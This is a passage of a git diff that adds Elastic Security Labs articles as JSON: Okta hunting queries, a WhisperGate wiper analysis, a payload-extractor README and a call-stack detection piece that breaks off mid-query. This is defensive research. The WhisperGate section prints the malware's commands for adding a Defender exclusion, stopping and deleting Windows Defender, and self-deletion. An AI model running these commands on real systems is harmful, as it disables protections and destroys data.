Logs pertaining to this action should be inspected:\n\n###### event.module:okta AND (event.action:user.session.impersonation.grant OR event.action:user.session.impersonation.initiate)\n\nThere are many other ways to look for suspicious activity in your Okta data. In addition to these queries, Elastic provides a large set of prebuilt detections for suspicious Okta activity used by other adversarial groups in our [open detection-rules repo](https://github.com/elastic/detection-rules/tree/main/rules/integrations/okta). This will be useful in generating alerts as Okta logs are coming into Elastic. You can use the query logic in those rules to drive other hunts beyond the four we mention above as well.\n\n\n\n> _Not familiar with what suspicious Okta data looks like?_\n>\n> _Read the_ [blog](https://www.elastic.co/blog/testing-okta-visibility-and-detection-dorothy) _from December 2020 where we discussed the subject and released an open adversary simulation tool called_ [Dorothy](https://github.com/elastic/dorothy) _to help security teams test_ _visibility, monitoring, and detection capabilities for Okta logs._\n>\n> _We expect many security teams will give SSO logs extra attention in light of this incident, and this tool may help teams get up to speed on the subject._\n\n## Earlier events: Microsoft, Nvidia, Samsung, Ubisoft\n\nAs previously stated, the LAPSUS$ group has been on a serious compromise train over the past few months, targeting a number of high-profile targets. 
Numerous details have been shared across a number of different media outlets, and a common theme of social engineering and internal access has been observed across many of the attacks:\n\n- [37GB of Source Code was leaked from Microsoft](https://www.bleepingcomputer.com/news/microsoft/lapsus-hackers-leak-37gb-of-microsofts-alleged-source-code/) in an earlier dump identified this week\n- [Ubisoft](https://www.zdnet.com/article/ubisoft-reveals-security-incident-forcing-company-wide-password-refresh/#ftag=RSSbaffb68) - Company-wide password reset after unusual activity was identified on its systems\n- [Nvidia issues](https://www.zdnet.com/article/ubisoft-reveals-security-incident-forcing-company-wide-password-refresh/#ftag=RSSbaffb68) notice after internal systems indicate data compromise\n- [Samsung confirms source-code](https://www.bloomberg.com/news/articles/2022-03-07/samsung-says-hackers-breached-company-data-galaxy-source-code) compromise via the LAPSUS$ group\n\nAs further information is uncovered and mechanisms for detection improve, Elastic Security will continue to update this post and provide subsequent posts relating to detections.\n\nIf you haven’t checked out the Elastic Security solution, take a look at our [Quick Start guides](https://www.elastic.co/training/free#quick-starts) (bite-sized training videos to get you started quickly) or our [free fundamentals training courses](https://www.elastic.co/training/free#fundamentals). You can always get started with a [free 14-day trial of Elastic Cloud](https://cloud.elastic.co/registration). Or [download](https://www.elastic.co/downloads/) the self-managed version of the Elastic Stack for free.\n"
+ },
+ "title": "Okta and LAPSUS$: What you need to know",
+ "slug": "okta-and-lapsus-what-you-need-to-know",
+ "date": "2022-06-02",
+ "description": "The latest organization under the microscope of the LAPSUS$ group is Okta. Threat hunt for the recent breach targeting Okta users using these simple steps in Elastic",
+ "author": [
+ {
+ "slug": "jake-king"
+ }
+ ],
+ "image": "blog-security-detection-720x420.png",
+ "category": [
+ {
+ "slug": "activity-group"
+ }
+ ]
+ },
+ "id": "security_labs_content-okta_and_lapsus_what_you_need_to_know-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-operation_bleeding_bear-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-operation_bleeding_bear-md.json
new file mode 100644
index 00000000000..bce62465b4e
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-operation_bleeding_bear-md.json
@@ -0,0 +1,42 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Operation Bleeding Bear\"\nslug: \"operation-bleeding-bear\"\ndate: \"2022-12-06\"\ndescription: \"Elastic Security verifies new destructive malware targeting Ukraine: Operation Bleeding Bear\"\nauthor:\n - slug: daniel-stepanic\n - slug: james-spiteri\n - slug: joe-desimone\n - slug: mark-mager\n - slug: andrew-pease\nimage: \"bleeding-bear.jpg\"\ncategory:\n - slug: campaigns\ntags:\n - bleeding bear\n - destructive\n - ransomware\n - malware\n---\n\n## Key Takeaways\n\n- Elastic Security provides new analysis and insights into targeted campaign against Ukraine organizations with destructive malware reported over the weekend of Jan 15, 2022\n- Techniques observed include process hollowing, tampering with Windows Defender, using a Master Boot Record (MBR) wiper, and file corruptor component\n- Elastic Security prevents each stage of the described campaign using prebuilt endpoint protection features\n\n\n\n## Overview\n\nOver this past weekend (1/15/2022), Microsoft released details of a new [campaign targeting Ukrainian government entities](https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/) and organizations with destructive malware. In a multi-staged attack, one malware component known as WhisperGate utilizes a wiping capability on the Master Boot Record (MBR), making any machine impacted inoperable after boot-up.\n\nWithin another stage, a file infector component is used to corrupt files in specific directories with specific file extensions. 
The elements used in this campaign lack the common characteristics of a ransomware compromise – in this case the adversary uses the same Bitcoin address for each victim and offers no sign of intent to decrypt the victim’s machine.\n\nThe Ukrainian National Cyber Security Coordination Center has been referring to this threat activity on its official [Twitter](https://twitter.com/ncsccUA/status/1482733473228013569?s=20) and [Facebook](https://www.facebook.com/ncsccUA/posts/449966023412420) accounts as Operation Bleeding Bear.\n\n\n\n**Elastic users are fully protected** from attacks like these through our advanced malware detection and Ransomware Protection capabilities in the platform. The Elastic Security team continues to monitor these events. This case highlights the importance of prevention when it’s up against ransomware and malware with destructive capabilities.\n\n### Stage 1: WhisperGate MBR payload\n\nThe Master Boot Record (MBR) is software that executes stored start-up information and, most importantly, informs the system of the location of the bootable partition on disk that contains the user’s operating system. If tampered with, this can result in the system being inoperable – a common tactic for malware and ransomware campaigns over the years to interrupt operation of the infected system.\n\nThe stage 1 binary is named stage1.exe and has low complexity. An 8192-byte buffer containing the new MBR data that includes the ransom note is allocated on the stack. A file handle pointing to the first physical drive, which contains the MBR, is retrieved via **CreateFileW**. That file handle is then passed to **WriteFile**, which writes only 512 bytes from the buffer over the Master Boot Record.\n\n## Malware analysis breakdown (Stages 1-4)\n\n\n\nThe host is subsequently rendered inoperable during the next boot-up sequence. 
Below is a screenshot showing the ransom note from an affected virtual machine.\n\n\n\nContained within the ransom note are instructions soliciting payment to a bitcoin wallet address of [1AVNM68gj6PGPFcJuftKATa4WLnzg8fpfv](https://www.blockchain.com/btc/address/1AVNM68gj6PGPFcJuftKATa4WLnzg8fpfv). The wallet does not appear to have received funds from victims as of the publication of this post.\n\n\n\n### Stage 2/3: Discord downloader and injector\n\nOnce the payload has gained a foothold, further destructive capabilities are facilitated by the stage 2 binary, called stage2.exe. This binary pulls down and launches a payload hosted via the Discord content delivery network, a [recently](https://www.riskiq.com/blog/external-threat-management/discord-cdn-abuse-malware/) [reported](https://www.zscaler.com/blogs/security-research/discord-cdn-popular-choice-hosting-malicious-payloads) approach which is increasingly being used by malicious actors.\n\n\n\nThe obfuscated .NET payload (described as Stage 3 below) is then executed in memory, setting off a number of events including:\n\n- Writing and executing a VBS script that uses PowerShell to add a Windows Defender exclusion on the root directory (C:)\n\n```\nWriting and executing a VBS script\n\n\"C:\\Windows\\System32\\WScript.exe\"\"C:\\Users\\jim\\AppData\\Local\\Temp\\Nmddfrqqrbyjeygggda.vbs\"\n\n```\n\n```\nUses PowerShell to add a Windows Defender exclusion\n\npowershell.exe Set-MpPreference -ExclusionPath 'C:\\'\n```\n\n[AdvancedRun](https://www.nirsoft.net/utils/advanced_run.html), a program used to run Windows applications with different settings, is then dropped to disk and executed in order to launch the Service Control Manager and stop the Windows Defender service (WinDefend).\n\n```\nAdvancedRun is used to stop Windows Defender\n\n\"C:\\Users\\jim\\AppData\\Local\\Temp\\AdvancedRun.exe\" /EXEFilename \"C:\\Windows\\System32\\sc.exe\" `\n /WindowState 0 /CommandLine \"stop WinDefend\" /StartDirectory \"\" 
/RunAs 8 /Run\n\n```\n\nAdvancedRun is used again when launching PowerShell to recursively delete the Windows Defender directory and its files.\n\n```\nAdvancedRun deleting the Windows Defender directory\n\n\"C:\\Users\\jim\\AppData\\Local\\Temp\\AdvancedRun.exe\" `\n /EXEFilename \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" /WindowState 0 `\n /CommandLine \"rmdir 'C:\\ProgramData\\Microsoft\\Windows Defender' -Recurse\" `\n /StartDirectory \"\" /RunAs 8 /Run\n```\n\nThe malware then copies InstallUtil.exe, a command-line utility that allows users to install and uninstall server resources, into the user’s %TEMP% directory. This action leverages the file for [process hollowing](https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process) by launching it in a suspended state.\n\n\n\nIt then proceeds to allocate memory (VirtualAllocEx), write the file corruptor payload (described as the Final Stage below) into memory (WriteProcessMemory), modify the thread entry point (SetThreadContext) to point to the file corruptor entry point, and start execution of the file corruptor (ResumeThread).\n\n\n\n### Final stage: File corruptor\n\nThe final file corruptor payload is loaded in memory via process hollowing into the InstallUtil process. 
The file corruptor:\n\n- Targets any local hard drives, attached USB drives, or mounted network shares\n- Scans directories for files matching internal hard-coded extension list (excluding the Windows folder)\n\n```\n.3DM .3DS .602 .7Z .ACCDB .AI .ARC .ASC .ASM .ASP .ASPX .BACKUP .BAK .BAT .BMP .BRD\n.BZ .BZ2 .C .CGM .CLASS .CMD .CONFIG .CPP .CRT .CS .CSR .CSV .DB .DBF .DCH .DER .DIF\n.DIP .DJVU.SH .DOC .DOCB .DOCM .DOCX .DOT .DOTM .DOTX .DWG .EDB .EML .FRM .GIF .GO\n.GZ .H .HDD .HTM .HTML .HWP .IBD .INC .INI .ISO .JAR .JAVA .JPEG .JPG .JS .JSP .KDBX\n.KEY .LAY .LAY6 .LDF .LOG .MAX .MDB .MDF .MML .MSG .MYD .MYI .NEF .NVRAM .ODB .ODG .ODP\n.ODS .ODT .OGG .ONETOC2 .OST .OTG .OTP .OTS .OTT .P12 .PAQ .PAS .PDF .PEM .PFX .PHP .PHP3\n.PHP4 .PHP5 .PHP6 .PHP7 .PHPS .PHTML .PL .PNG .POT .POTM .POTX .PPAM .PPK .PPS .PPSM .PPSX\n.PPT .PPTM .PPTX .PS1 .PSD .PST .PY .RAR .RAW .RB .RTF .SAV .SCH .SHTML .SLDM .SLDX .SLK\n.SLN .SNT .SQ3 .SQL .SQLITE3 .SQLITEDB .STC .STD .STI .STW .SUO .SVG .SXC .SXD .SXI .SXM\n.SXW .TAR .TBK .TGZ .TIF .TIFF .TXT .UOP .UOT .VB .VBS .VCD .VDI .VHD .VMDK .VMEM .VMSD\n.VMSN .VMSS .VMTM .VMTX .VMX .VMXF .VSD .VSDX .VSWP .WAR .WB2 .WK1 .WKS .XHTML .XLC .XLM\n.XLS .XLSB .XLSM .XLSX .XLT .XLTM .XLTX .XLW .YML .ZIP\n\n```\n\n- Overwrites the start of each targeted file with 1MB of static data (byte 0xCC), regardless of file size\n- Renames each targeted file to a randomized extension\n- Deletes self with the command:\n\n```\nOverwriting, renaming, and deleting files\n\ncmd.exe /min /C ping 111.111.111.111 -n 5 -w 10 > Nul & Del /f /q \n\n```\n\n\n\n## MBR protection with Elastic Security\n\nChanges to the MBR are particularly strong signals of anomalous and destructive activity typically associated with ransomware. 
To counteract this, Elastic Security researchers built an MBR protection component based around these signals into our multi-layered ransomware protection feature.\n\nWhen a process attempts to overwrite the contents of the MBR, the prewrite buffer and other associated process metadata will be analyzed inline before any changes are written to disk. If the activity is deemed malicious in nature, the process will be terminated immediately (prevention mode) and/or an appropriate ransomware alert will be generated (prevention and detection modes) to allow security operators time to respond.\n\nWhen configured in prevention mode, Elastic Security’s ransomware protection ensures that the integrity of the MBR is fully preserved, with no changes ever reaching disk thanks to the synchronous framework leveraged by the feature — effectively stopping the ransomware attack in its tracks as the offending process is terminated.\n\nWhen WriteFile is invoked on PhysicalDrive0 on a host running Elastic Security with ransomware protection enabled, the pending change will immediately be analyzed and deemed malicious. Afterwards, the process will be terminated, the endpoint user will be alerted via a popup notification, and a ransomware prevention alert will be sent to and stored in Elasticsearch. The intended ransom note can be easily deciphered after Base64 decoding the contents of the prewrite buffer found in the alert within Kibana.\n\n\n\nIt is important to note that while this behaviour is detected by Elastic, it is not specific to this payload but rather to the behaviour the payload is exhibiting. This increases our chance of being able to detect and prevent malicious behaviors, even when a static signature of the malware is not known. 
Threat actors find this kind of control more difficult to evade than traditional, signature-based detection and prevention approaches.\n\n## Observing WhisperGate in Elastic Security\n\nBy observing the process hash of the stage 1 dropper above (a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92) via the process.hash field within Elastic Security, we can isolate the ransomware alert and analyze the blocked attempt at overwriting the MBR.\n\n\n\n\n\nAs we can see, the data is stored as a Base64-encoded string in Elasticsearch. Decoded, we can see the contents of the ransom note that would be displayed to the end user of an affected system.\n\n\n\n## Alert breakdown and defensive recommendations\n\nThe following alerts were triggered in Elastic Security during our investigations:\n\n### Endpoint Security Integration Alerts\n\n#### Stage 1 - MBR Wiper\n\n(a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92)\n\n- Malware Prevention Alert\n- Ransomware Prevention Alert (MBR overwrite)\n\n#### Stage 2 - Downloader\n\n(dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78)\n\n- Malware Prevention Alert\n\n#### Stage 3 + Stage 4 - Injector/File Corruptor\n\n(34CA75A8C190F20B8A7596AFEB255F2228CB2467BD210B2637965B61AC7EA907)\n\n- Ransomware Prevention Alert (canary files)\n- Malicious Behaviour Prevention Alert - Binary Masquerading via Untrusted Path\n- Memory Threat Prevention Alert\n\n### Prebuilt Detection Engine Alerts\n\nThe following existing [public detection rules](https://github.com/elastic/detection-rules) can also be used to detect some of the employed techniques:\n\n- [Suspicious Execution via Windows Management Instrumentation (WMI)](https://github.com/elastic/detection-rules/blob/main/rules/windows/execution_suspicious_cmd_wmi.toml)\n- [Windows Defender Exclusions Added via PowerShell](https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_defender_exclusion_via_powershell.toml)\n- 
[Connection to Commonly Abused Web Services](https://github.com/elastic/detection-rules/blob/main/rules/windows/command_and_control_common_webservices.toml)\n- [Process Execution from an Unusual Directory](https://github.com/elastic/detection-rules/blob/main/rules/windows/execution_from_unusual_directory.toml)\n- [Windows Script Executing PowerShell](https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/initial_access_script_executing_powershell.toml)\n- [Disabling Windows Defender Security Settings via PowerShell](https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_disabling_windows_defender_powershell.toml)\n\n### Hunting queries\n\nDetect attempt to tamper with Windows defender settings via [NirSoft AdvancedRun](https://www.nirsoft.net/utils/advanced_run.html) executed by [the Stage 3 injector](https://www.virustotal.com/gui/file/923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6/community):\n\n```\nDetect attempts to tamper with Windows Defender\n\nprocess where event.type == \"start\" and\nprocess.pe.original_file_name == \"AdvancedRun.exe\" and\nprocess.command_line :\n (\"*rmdir*Windows Defender*Recurse*\",\n \"*stop WinDefend*\")\n```\n\nMasquerade as InstallUtil via code injection:\n\n```\nIdentifies code injection with InstallUtil\n\nprocess where event.type == \"start\" and\nprocess.pe.original_file_name == \"InstallUtil.exe\" and\nnot process.executable : \"?:\\\\Windows\\\\Microsoft.NET\\\\*\"\n```\n\n## MITRE ATT&CK\n\n- [T1561.002 - Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002/)\n- [T1562.001 - Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001/)\n- [T1047 - Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047/)\n- [T1102 - Web Service](https://attack.mitre.org/techniques/T1102/)\n- [T1055 - Process Injection](https://attack.mitre.org/techniques/T1055/)\n- 
[T1027 - Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027/)\n\n## Summary\n\nThese targeted attacks on Ukraine using destructive malware match a pattern observed in past attacks such as [NotPetya](https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world/). By leveraging different malware components to wipe machines and corrupt files, it’s apparent there was no intent to collect funds; rather, the attack was likely intended to sow chaos and cast doubt on Ukraine’s stability.\n\nAs these events are still ongoing, we wanted to release some initial analysis and observations from our perspective. We also wanted to highlight the prevention capabilities of Elastic Security across each stage of this attack, available to everyone today.\n\nExisting Elastic Security users can access these capabilities within the product. If you’re new to Elastic Security, take a look at our [Quick Start guides](https://www.elastic.co/training/free#quick-starts) (bite-sized training videos to get you started quickly) or our [free fundamentals training courses](https://www.elastic.co/training/free#fundamentals). 
You can always get started with a [free 14-day trial of Elastic Cloud](https://cloud.elastic.co/registration?elektra=whats-new-elastic-security-7-16-blog).\n\n## Indicators\n\n| Indicator | Type | Note |\n| ---------------------------------------------------------------- | ------ | ---------------------------- |\n| a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92 | SHA256 | Stage1.exe (MBR wiper) |\n| dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78 | SHA256 | Stage2.exe (Downloader) |\n| 923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6 | SHA256 | Stage3 (Injector - original) |\n| 9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d | SHA256 | Stage3 (Injector - fixed) |\n| 34CA75A8C190F20B8A7596AFEB255F2228CB2467BD210B2637965B61AC7EA907 | SHA256 | Stage4 (File Corruptor) |\n\n## Artifacts\n\nArtifacts are also available for [download](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc57bd32cdaea24f7/628e88d8b385dc5352428ffc/bleeding-bear-indicators.zip) in both ECS and STIX format in a combined zip bundle.\n"
+ },
+ "title": "Operation Bleeding Bear",
+ "slug": "operation-bleeding-bear",
+ "date": "2022-12-06",
+ "description": "Elastic Security verifies new destructive malware targeting Ukraine: Operation Bleeding Bear",
+ "author": [
+ {
+ "slug": "daniel-stepanic"
+ },
+ {
+ "slug": "james-spiteri"
+ },
+ {
+ "slug": "joe-desimone"
+ },
+ {
+ "slug": "mark-mager"
+ },
+ {
+ "slug": "andrew-pease"
+ }
+ ],
+ "image": "bleeding-bear.jpg",
+ "category": [
+ {
+ "slug": "campaigns"
+ }
+ ],
+ "tags": [
+ "bleeding bear",
+ "destructive",
+ "ransomware",
+ "malware"
+ ]
+ },
+ "id": "security_labs_content-operation_bleeding_bear-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-parallax_payload_extractor-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-parallax_payload_extractor-md.json
new file mode 100644
index 00000000000..2260e401367
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-parallax_payload_extractor-md.json
@@ -0,0 +1,28 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"PARALLAX Payload Extractor\"\nslug: \"parallax-payload-extractor\"\ndate: \"2022-12-06\"\ndescription: \"Python script to extract the payload from PARALLAX samples.\"\nauthor:\n - slug: elastic-security-labs\nimage: \"tools-image.jpg\"\ncategory:\n - slug: tools\ntags:\n - parallax\n - ref2731\n---\n\nPython script to extract the payload from PARALLAX samples.\n\n[Download parallax-payload-extractor.tar.gz](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltdcec03c5c91923f5/633613d524bebb2394c2773d/parallax-payload-extractor.tar.gz)\n\n> For information on the PARALLAX malware loader and campaign observations, check out our [blog posts](https://elastic.co/security-labs/exploring-the-ref2731-intrusion-set) detailing this intrusion set.\n\n## Getting started\n\n### Docker\n\nThe recommended and easiest way to get going is to use Docker. From the directory this README is in, you can build a local container.\n\n```\ndocker build . -t parallax_loader_payload_extractor\n```\n\nThen we run the container with the -v flag to map a host directory to the Docker container directory.\n\n```\ndocker run -ti --rm -v $(pwd)/data:/data parallax_loader_payload_extractor:latest --help\n```\n\n### Running it locally\n\nAs mentioned above, Docker is the recommended approach to running this project; however, you can also run it locally. This project uses [Poetry](https://python-poetry.org/) to manage dependencies, testing, and metadata. If you already have Poetry installed, you can run the following commands from this directory to run the tool. This will set up a virtual environment, install the dependencies, activate the virtual environment, and run the console script.\n\n```\npoetry lock\npoetry install\npoetry shell\nparallax_loader_payload_extractor --help\n```\n\n## Usage\n\nWe can specify either a single sample with the **-f** option or a directory of samples with **-d**. 
You can use the **-o** switch to set the output directory for the payloads.\n\n```\ndocker run -ti --rm -v $(pwd)/data:/data parallax_loader_payload_extractor:latest -d /data -o /data\n```\n\n\n\nYou can collect the extracted payloads from the directory you set when running the extractor; in the above example, this is the data directory in the root of the extractor.\n"
+ },
+ "title": "PARALLAX Payload Extractor",
+ "slug": "parallax-payload-extractor",
+ "date": "2022-12-06",
+ "description": "Python script to extract the payload from PARALLAX samples.",
+ "author": [
+ {
+ "slug": "elastic-security-labs"
+ }
+ ],
+ "image": "tools-image.jpg",
+ "category": [
+ {
+ "slug": "tools"
+ }
+ ],
+ "tags": [
+ "parallax",
+ "ref2731"
+ ]
+ },
+ "id": "security_labs_content-parallax_payload_extractor-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-peeling_back_the_curtain_with_call_stacks-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-peeling_back_the_curtain_with_call_stacks-md.json
new file mode 100644
index 00000000000..ef90891446f
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-peeling_back_the_curtain_with_call_stacks-md.json
@@ -0,0 +1,35 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Peeling back the curtain with call stacks\"\nslug: \"peeling-back-the-curtain-with-call-stacks\"\ndate: \"2023-09-13\"\ndescription: \"In this article, we'll show you how we contextualize rules and events, and how you can leverage call stacks to better understand any alerts you encounter in your environment.\"\nauthor:\n - slug: samir-bousseaden\nimage: \"photo-edited-10@2x.jpg\"\ncategory:\n - slug: security-operations\n - slug: security-research\n - slug: detection-science\ntags:\n - detection engineering\n - threat hunting\n - threat detection\n---\n\n## Introduction\nElastic Defend provides over [550 rules](https://github.com/elastic/protections-artifacts/tree/main/behavior/rules) (and counting) to detect and stop malicious behavior in real time on endpoints. We recently [added kernel call stack enrichments](https://www.elastic.co/security-labs/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks) to provide additional context to events and alerts. Call stacks are a win-win-win for behavioral protections, simultaneously reducing false positives and false negatives while improving alert explainability. In this article, we'll show you how we achieve all three of these, and how you can leverage call stacks to better understand any alerts you encounter in your environment.\n\n## What is a call stack?\nWhen a thread running function A calls function B, the CPU automatically saves the current instruction’s address (within A) to a thread-specific region of memory called the stack. This saved pointer is known as the return address - it's where execution will resume once B has finished its job. If B were to call a third function C, then a return address within B will also be saved to the stack. 
These return addresses can be retrieved through a process known as a [stack walk](https://learn.microsoft.com/en-us/windows/win32/debug/capturestackbacktrace), which reconstructs the sequence of function calls that led to the current thread state. Stack walks list return addresses in reverse-chronological order, so the most recent function is always at the top.\n\nIn Windows, when we double-click on **notepad.exe**, for example, the following series of functions are called: \n\n - The green section is related to base thread initialization performed by the operating system and is usually identical across all operations (file, registry, process, library, etc.)\n - The red section is the user code; it is often composed of multiple modules and provides approximate details of how the process creation operation was reached\n - The blue section is the Win32 and Native API layer; this is operation-specific, including the last 2 to 3 intermediary Windows modules before forwarding the operation details for effective execution in kernel mode\n\nThe following screenshot depicts the call stack for this execution chain:\n\n\n\nHere is an example of file creation using **notepad.exe** where we can see a similar pattern: \n\n - The blue part lists the last user mode intermediary Windows APIs before forwarding the create file operation to kernel mode drivers for effective execution\n - The red section includes functions from **user32.dll** and **notepad.exe**, which indicate that this file operation was likely initiated via the GUI\n - The green part represents the initial thread initialization\n \n \n\n## Events Explainability\n\nBeyond finding known bad, like [unbacked memory regions](https://www.elastic.co/security-labs/hunting-memory) with RWX permissions that may be the remnants of prior code injection, call stacks provide very low-level visibility that often reveals greater insights than logs can otherwise provide. 
\n\nAs an example, while hunting for suspicious process executions started by **WmiPrvSe.exe** via WMI, you find this instance of **notepad.exe**:\n\n\n\nReviewing the standard event log fields, you may expect that it was started using the [Win32_Process](https://learn.microsoft.com/en-us/windows/win32/cimwin32prov/win32-process) class with the **wmic.exe process call create notepad.exe** syntax. However, the event details describe a series of modules and functions: \n\n\n\nThe blue section depicts the standard intermediary **CreateProcess** Windows APIs, while the red section is more revealing: the DLL immediately before the first call to **CreateProcessW** is **wbemcons.dll**, and inspecting its properties shows that it’s related to [WMI Event Consumers](https://learn.microsoft.com/en-us/windows/win32/wmisdk/commandlineeventconsumer). We can conclude that this **notepad.exe** instance is likely related to a WMI Event Subscription. This will require specific incident response steps to mitigate the WMI persistence mechanism.\n\n\n\nAnother great example is Windows scheduled tasks. When executed, they are spawned as children of the Schedule service, which runs within a **svchost.exe** host process. Modern Windows 11 machines may have 50 or more **svchost.exe** processes running. Fortunately, the Schedule service has a specific process argument **-s Schedule** which differentiates it: \n\n\n\nIn older Windows versions, the Scheduled Tasks service is a member of the Network Service group and executed as a component of the **netsvcs** shared **svchost.exe** instance. 
Not all children of this process are necessarily scheduled tasks in these older versions: \n\n\n\nInspecting the call stack on both versions, we can see the module that is adjacent to the **CreateProcess** call is the same **ubpm.dll** (Unified Background Process Manager DLL) executing the exported function **ubpm.dll!UbpmOpenTriggerConsumer**:\n\n\n\nUsing the following KQL query, we can hunt for task executions on both versions: \n\n```\nevent.action :\"start\" and \nprocess.parent.name :\"svchost.exe\" and process.parent.args : netsvcs and \nprocess.parent.thread.Ext.call_stack_summary : *ubpm.dll* \n```\n\n\n\nAnother interesting example occurs when a user double-clicks a script file from a ZIP archive that was opened using Windows Explorer. Looking at the process tree, you will see that **explorer.exe** is the parent and the child is a script interpreter process like **wscript.exe** or **cmd.exe**. \n\nThis process tree can be confused with a user double-clicking a script file from any location on the file system, which is not very suspicious. But if we inspect the call stack we can see that the parent stack is pointing to **zipfld.dll** (Zipped Folders Shell Extension): \n\n\n\n## Detection Examples \nNow that we have a better idea of how to use the call stack to better interpret events, let’s explore some advanced detection examples per event type.\n\n### Process \n\n#### Suspicious Process Creation via Reflection\n[Dirty Vanity](https://www.deepinstinct.com/blog/dirty-vanity-a-new-approach-to-code-injection-edr-bypass) is a recent code-injection technique that abuses process forking to execute shellcode within a copy of an existing process. When a process is forked, the OS makes a copy of an existing process, including its address space and any [inheritable](https://learn.microsoft.com/en-us/windows/win32/sysinfo/handle-inheritance) handles therein. 
\n\nWhen executed, Dirty Vanity will fork an instance of a targeted process (already running or a sacrificial one) and then inject into it. Using process creation notification [callbacks](https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nc-ntddk-pcreate_process_notify_routine_ex) won’t log forked processes because the forked process’s initial thread isn’t executed. But in the case of this injection technique, the forked process will be injected and a thread will be started, which triggers the process start event log with the following call stack: \n\n\n\nWe can see the call to **RtlCreateProcessReflection** and **RtlCloneUserProcess** to fork the process. Now we know that this is a forked process, and the next question is “Is this common in normal conditions?” Diagnostically, this behavior appears to be common, and alone it is not a strong signal of something malicious. Checking further, forked processes that perform network connections, load DLLs, or spawn child processes proved to be less common and made for good detections: \n\n```\n// EQL detecting a forked process spawning a child process - very suspicious\n\nprocess where event.action == \"start\" and\n\ndescendant of \n [process where event.action == \"start\" and \n _arraysearch(process.parent.thread.Ext.call_stack, $entry, \n $entry.symbol_info: \n (\"*ntdll.dll!RtlCreateProcessReflection*\", \n \"*ntdll.dll!RtlCloneUserProcess*\"))] and\n\nnot (process.executable : \n (\"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFault.exe\", \n \"?:\\\\WINDOWS\\\\system32\\\\WerFault.exe\") and\n process.parent.thread.Ext.call_stack_summary : \n \"*faultrep.dll|wersvc.dl*\")\n```\n\n```\n// EQL detecting a forked process loading a network DLL \n// or performing a network connection - very suspicious\n\nsequence by process.entity_id with maxspan=1m\n [process where event.action == \"start\" and\n _arraysearch(process.parent.thread.Ext.call_stack, \n $entry, $entry.symbol_info: \n 
(\"*ntdll.dll!RtlCreateProcessReflection*\", \n \"*ntdll.dll!RtlCloneUserProcess*\"))]\n [any where\n (\n event.category : (\"network\", \"dns\") or \n (event.category == \"library\" and \n dll.name : (\"ws2_32.dll\", \"winhttp.dll\", \"wininet.dll\"))\n )]\n```\n\nHere’s an example of forking **explorer.exe** and executing shellcode that spawns **cmd.exe** from the forked **explorer.exe** instance:\n\n\n\n\n\n#### Direct Syscall via Assembly Bytes\nThe second and final example for process events is process creation via direct syscall. This directly uses the syscall instruction instead of calling the **NtCreateProcess** API. Adversaries may use [this method](https://www.ired.team/offensive-security/defense-evasion/using-syscalls-directly-from-visual-studio-to-bypass-avs-edrs) to avoid security products that are reliant on usermode API hooking (which Elastic Defend is not):\n\n```\nprocess where event.action : \"start\" and \n\n// EQL detecting a call stack not ending with ntdll.dll \nnot process.parent.thread.Ext.call_stack_summary : \"ntdll.dll*\" and \n\n/* last call in the call stack contains bytes that execute a syscall\n manually using assembly */\n\n_arraysearch(process.parent.thread.Ext.call_stack, $entry,\n ($entry.callsite_leading_bytes : (\"*4c8bd1b8??????000f05\", \n \"*4989cab8??????000f05\", \"*4c8bd10f05\", \"*4989ca0f05\")))\n```\n \nThis example matches when the final memory region in the call stack is unbacked and contains assembly bytes that end with the syscall instruction (**0F05**):\n\n\n\n## File\n\n### Suspicious Microsoft Office Embedded Object\nThe following rule logic identifies suspicious file extensions written by a Microsoft Office process from an embedded OLE stream, frequently used by malicious documents to drop payloads for initial access.\n\n\n\n```\n// EQL detecting file creation event with call stack indicating \n// OleSaveToStream call to save or load the embedded OLE object\n\nfile where event.action != \"deletion\" and 
